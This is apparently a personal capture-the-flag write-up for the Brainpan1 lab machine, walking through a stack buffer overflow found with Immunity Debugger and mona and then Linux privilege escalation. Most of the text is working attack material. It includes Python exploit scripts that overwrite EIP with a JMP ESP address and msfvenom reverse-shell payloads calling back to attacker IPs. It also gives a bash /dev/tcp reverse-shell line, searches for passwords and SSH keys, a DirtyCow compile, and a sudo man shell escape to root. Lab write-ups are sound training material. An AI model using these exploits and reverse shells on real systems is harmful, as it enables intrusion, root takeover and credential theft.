Brainpan1 (Buffer Overflow with Immunity Debugger)

buffer overflow of an executable. You can use the BOF windows machine

we found the exe

Buffer Overflow:

open immunity debugger as admin

file >open/attach > the exe you want to find the buffer overflow in

hit play to run the application (if you used open not attach)

make a fuzzer on Kali:

mousepad fuzzer.py

my fuzzer for this (a program that asks for input then you hit enter)

run it:

python3 fuzzer.py

in immunity: use View > CPU > Maximize

find the EIP (the pointer). We want to control the pointer to make it execute something malicious.

it crashed at 1000

reopen immunity:

use script to create a payload:

msf-pattern_create -l 1000

edit the fuzz again with the 1000 payload:

mousepad fuzzmsf.py

take note of the EIP address:

35724134

create new script:

msf-pattern_offset -l 1000 -q 35724134

exact offset at 524!

that means that the EIP is at the 525th byte.

double check that this is right:

send A’s until the EIP then replace EIP with BBBB:

import sys, socket
from time import sleep
	
buffer = "A" * 524 + "B" * 4

print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send((payload.encode()))
s.close()

EIP comes back to:

42424242

which means we replace it with B’s

find bad characters:

Google badchars and get the github Embed GitHub

make a script with the bad characters to find the bad characters:

once you run it, go into immunity debugger and:

go to ESP, right lick, Follow in Dump

The hex should be 01, 02, 03, etc in order until FF (like the payload we have up ^). Any bad characters would show up as 00 in the dump. You can remove and retest until you have all the bad characters identified.

example output no bad characters:

example character if x80 was bad:

It shows as 00 instead of 80 so we know we need to remove it and retest!

Mona in Immunity Debugger:

at the bottom of immunity debugger, type:

!mona modules

to check for protections.

brainpan here has all False for all protections.

find a return address:

!mona find -s "\xff\xe4" -m brainpan.exe

those hexes are jmp esp instructions:

the one pointer found:

311712f3

you can find it in the program (is this necessary?):

hit the black → next to play and type that number until it takes you there

we have that jmp esp in it. We can set a breakpoint by hitting F2

make a script:

import sys, socket
from time import sleep
	
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" #b is for encoding

print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.218.129',9999))
s.send(payload)
s.close()

we type the pointer address backwards so instead of the logical \x31\x17 you do what’s in the code! (this is little endian)

this code is also doing the encoding manually instead of using python encode. Could use this if there are issues with the characters being sent!

we hit the breakpoint on brainpan at the address we specified. That means what we’re doing is working. Now it’s time to make a payload!

run the program and go to Kali:

we use msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -b "\x00" -f c

we’re setting LHOST (kali) and port, then we’re identifying bad characters with -b (x00 is always a bad character), then -f c

payload generated:

script (add the b’s in front of the quotes since python encoding was funky):

set a nc listener on 7777

run it with the program running on the computer and you get shell

now we can do this on the website by changing the msfvenom LHOST to tun0 and target address to the website:

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c

script:

we get shell!

ls doesn’t work. is it windows?:

dir

it’s a windows, but we have linux file system. It’s a hybrid

if we go to /bin, we can use some of the linux commands

how do we just migrate to a linux shell?

restart the machine

while it’s deploying, make a new linux shell:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.62.12 LPORT=7777 -b "\x00" -f c

we get linux shell!

get a tty on bash:

python -c 'import pty; pty.spawn("/bin/bash")'

how to completely upgrade like full access with tab auto complete:

ctrl+z
stty -raw echo; fg
reset
#if prompted fot Terminal type (I wasn't)
xterm

do the enums:

linpeas found dirtycow

compile:

gcc -pthread dirtycow.c -o dirtycow -lcrypt

sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
ls -la

WHAT I MISSED:

being able to run manual and it giving us the man page for the commands, means sudo to man which we can find on GTFOBins

man | GTFOBins

sudo -l we can run something as sudo and it lets us do manual for any command:

sudo /home/anansi/bin/anansi_util manual ls

opens the ls manual

how to get root with it:

in the manual page:

!/bin/bash

we get root!

this is called shell escape squence

checksrv.sh can get us shell?

edit it with echo:

echo "bash -i >& /dev/tcp/10.6.62.12/5555 0>&1" > checksrv.sh

no permission